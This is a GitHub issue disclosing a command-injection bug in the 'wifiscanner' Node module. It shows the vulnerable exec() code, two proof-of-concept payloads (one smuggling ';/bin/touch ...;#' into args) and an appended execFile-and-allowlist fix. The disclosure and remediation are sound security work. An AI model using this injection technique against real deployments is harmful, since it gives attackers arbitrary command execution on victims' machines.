Remote Code Execution Bug due to Improper Input Sanitization #1

Open
AbhishekHerle opened this issue Jun 11, 2020 · 0 comments
This module can be used with options that can be used to overwrite default executable/binary path and arguments to the said executable/binary. An attacker can abuse this functionality to have the module execute a binary of their choice.

The following code snippets in wifiscanner.js are responsible for the issue.

```javascript
scan(callback, standardErrorCallback) {
  childProcess.exec(this.command, (error, standardOut, standardError) => {
    if (standardError && typeof standardErrorCallback === "function") {
      standardErrorCallback(standardError);
    }
    callback(error, this.parse(standardOut.toString()));
  });
}

get command() {
  return this.options.binaryPath + " " + this.options.args;
}
```

As we can see, this.command is not sanitized in any way prior to being passed to exec().

Hence, the following payloads can be used to execute arbitrary commands:

Exploit 1:

```javascript
let wifiscanner = require("wifiscanner");
let options = {
  args: ";/bin/touch /tmp/exploit.txt;#"
}
let scanner = wifiscanner(options);
scanner.scan(function(error, networks){});
```

Exploit 2:

```javascript
let wifiscanner = require("wifiscanner");
let options = {
  args: "/tmp/exploit.txt",
  binaryPath: "/bin/touch"
}
let scanner = wifiscanner(options);
scanner.scan(function(error, networks){});
```

User input must be appropriately sanitized prior to being passed to the module. At the very least users must be advised to manually sanitize user inputs when using this module.
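
An added example, not part of the original issue or the wifiscanner project's code: one way to close both payloads above is to run the binary without a shell (`execFile` with an argument array) and to check `binaryPath` against an allowlist. The allowlisted paths, the default binary, the `SAFE_ARG` pattern and the `buildCommand`/`scan` signatures are assumptions made for illustration.

```javascript
const { execFile } = require("child_process");

// Assumption: the only binaries this deployment should ever run.
const ALLOWED_BINARIES = new Set(["/sbin/iwlist", "/usr/sbin/iwlist"]);
// Conservative token pattern: interface names and simple flags only.
// No whitespace, quotes, slashes or shell metacharacters.
const SAFE_ARG = /^[A-Za-z0-9_.:=-]{1,64}$/;

// Validate caller-supplied options and return { file, argv }, or throw.
function buildCommand(options = {}) {
  const file = options.binaryPath ?? "/sbin/iwlist"; // assumed default
  if (typeof file !== "string" || !ALLOWED_BINARIES.has(file)) {
    throw new Error("binaryPath is not on the allowlist");
  }
  const argv = options.args ?? ["scan"];
  // A single string would have to be split by a shell; insist on tokens.
  if (!Array.isArray(argv)) {
    throw new Error("args must be an array of tokens, not a string");
  }
  for (const arg of argv) {
    if (typeof arg !== "string" || !SAFE_ARG.test(arg)) {
      throw new Error("rejected argument: " + JSON.stringify(arg));
    }
  }
  return { file, argv: [...argv] };
}

// Hardened counterpart of scan(): execFile passes argv directly to the
// binary, so ';', '#', '$()' and friends are never interpreted by a shell.
function scan(options, parse, callback) {
  let cmd;
  try {
    cmd = buildCommand(options);
  } catch (err) {
    return callback(err);
  }
  execFile(cmd.file, cmd.argv, { timeout: 10000 }, (error, stdout) => {
    if (error) return callback(error);
    callback(null, parse(stdout.toString()));
  });
}
```

With this shape, the `args` string from Exploit 1 is rejected because it is not an array of tokens, and the `binaryPath` from Exploit 2 is rejected because `/bin/touch` is not on the allowlist.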
